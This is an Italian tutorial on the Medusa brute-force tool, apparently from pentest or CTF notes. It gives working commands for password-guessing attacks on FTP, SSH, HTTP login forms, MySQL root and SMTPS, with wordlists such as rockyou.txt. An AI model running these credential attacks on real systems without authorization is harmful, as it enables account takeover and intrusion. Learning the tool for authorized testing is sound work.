tags: Medusa bruteforce


Medusa è un potente tool per il brute-force di credenziali simile a Hydra, ma con un’architettura più modulare e parallela. Funziona su Kali Linux e altre distribuzioni Linux senza bisogno di installazioni particolari.

✔ Supporta vari protocolli: SSH, FTP, HTTP, RDP, SMB, Telnet, MySQL, PostgreSQL, VNC, POP3, SMTP e altri. ✔ Multithreading veloce → Permette di testare più credenziali contemporaneamente per ogni tentativo. ✔ Supporto avanzato per file di username e password → Può usare liste diverse per ogni protocollo.

La sintassi principale di Medusa è:

medusa -h <IP-TARGET> -u <USERNAME> -P <WORDLIST> -M <MODULO>

🔹 -h <IP> → L’host bersaglio (può essere un dominio o un indirizzo IP).
🔹 -u <USERNAME> → Il nome utente da testare.
🔹 -P <WORDLIST> → La lista di password da provare.
🔹 -M <MODULO> → Il modulo del servizio da attaccare (FTP, SSH, HTTP, ecc.).
🔹 -t <NUM> → Numero di thread per velocizzare l’attacco.
🔹 -n <PORT> → Specifica una porta diversa se necessaria.

Attacco FTP su un singolo host:

Supponiamo di voler testare le credenziali FTP su 192.168.1.100 usando una lista di nomi utente e una lista di password.

medusa -h 192.168.1.100 -U userlist.txt -P passwordlist.txt -M ftp -t 4
  • -h 192.168.1.100: Specifica l’IP del target.
  • -U userlist.txt: File contenente una lista di nomi utente.
  • -P passwordlist.txt: File contenente una lista di password.
  • -M ftp: Specifica il modulo FTP.
  • -t 4: Utilizza 4 thread contemporaneamente.

Attacco SSH con un solo utente:

Se vuoi testare una sola combinazione di utente e password su un server SSH:

medusa -h 192.168.1.100 -u admin -P passwordlist.txt -M ssh -t 5
  • -u admin: Specifica un singolo nome utente (admin).
  • -P passwordlist.txt: File contenente una lista di password.
  • -M ssh: Specifica il modulo SSH.
  • -t 5: Utilizza 5 thread.
  • Se la porta SSH non è quella standard (22), aggiungi -n <port>.

Attacco Brute-Force su un login HTTP (Form-Based)

Se un sito ha una pagina di login (http://target.com/login), puoi attaccarla così:

medusa -h target.com -u admin -P rockyou.txt -M http -m FORM:/login.php

🔹 Attacca un form di login HTTP su /login.php con username admin.
🔹 Questo funziona solo se il modulo FORM è supportato per quel sito.

Attacco Brute-Force su MySQL

medusa -h 192.168.1.250 -u root -P rockyou.txt -M mysql

Tenta di accedere al database MySQL con l’utente root e una lista di password.
Puoi specificare la porta con -n 3306 se diversa dal default.

Attacco SMTPS

medusa -h 10.10.219.206 -u [email protected] -P clinic_rule.txt -M smtp -s -n 465 -t 2